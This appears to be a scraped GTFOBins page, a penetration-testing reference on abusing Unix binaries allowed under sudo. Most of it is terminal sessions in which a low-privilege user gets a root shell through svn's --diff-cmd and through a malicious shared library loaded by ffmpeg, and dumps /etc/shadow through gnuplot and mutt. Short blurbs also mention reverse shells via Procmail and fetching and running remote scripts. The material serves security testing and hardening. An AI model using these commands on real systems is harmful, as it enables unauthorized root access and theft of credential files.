GTFOBins.github.io
                        GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Reference: https://www.shielder.com/blog/2024/09/a-journey-from-sudo-iptables-to-local-privilege-escalation/
Added an entry for the 'cmake' binary, which is commonly used by developers and for creating projects from source.
I stumbled upon a way to copy a file (ASCII script, it does not work as well with binaries) from a remote server and execute it without ever creating anything...
This new GTFOBin is not as common on some systems, but there may be occasions where it is present. The Procmail configuration file will allow us to execute reverse shells,...
```
lowpriv@7dc99421ba84:/tmp/working$ TD=$(mktemp -d)
svnadmin create $TD/pwn
svn checkout file:///$TD/pwn $TD/project
echo -e '#!/bin/bash\n/bin/sh' > $TD/shell
chmod +x $TD/shell
sudo svn diff --diff-cmd "$TD/shell"
Checked out revision 0.
Index: c...
```
```
lowpriv@7dc99421ba84:/tmp$ TD=$(mktemp -d)
printf "\x52\x49\x46\x46\x24\x00\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x22\x56\x00\x00\x01\x00\x08\x00\x64\x61\x74\x61\x00\x00\x00\x00" > "$TD/any.wav"
echo -e '#include \n#include \n__attribute__((constructor)) static void setup(void) {\nsetgid(0);\nsetuid(0);\nsystem("/bin/sh -c reset");\nsystem("/bin/sh");\n}' | gcc -x c -shared -fPIC -o $TD/libgtfo.so -
sudo ffmpeg...
```
```
lowpriv@7dc99421ba84:/tmp$ LFILE=/etc/shadow
lowpriv@7dc99421ba84:/tmp$ sudo gnuplot -e 'set print "-" ; print system("cat '$LFILE'")'
root:*:20007:0:99999:7:::
daemon:*:20007:0:99999:7:::
bin:*:20007:0:99999:7:::
sys:*:20007:0:99999:7:::
sync:*:20007:0:99999:7:::
games:*:20007:0:99999:7:::
man:*:20007:0:99999:7:::
lp:*:20007:0:99999:7:::
mail:*:20007:0:99999:7:::
news:*:20007:0:99999:7:::
uucp:*:20007:0:99999:7:::
proxy:*:20007:0:99999:7:::
www-data:*:20007:0:99999:7:::
backup:*:20007:0:99999:7:::
list:*:20007:0:99999:7:::
irc:*:20007:0:99999:7:::
...
```
```
lowpriv@7dc99421ba84:/tmp$ LFILE=/etc/shadow
lowpriv@7dc99421ba84:/tmp$ sudo mutt -i $LFILE
root:*:20007:0:99999:7:::
daemon:*:20007:0:99999:7:::
...
```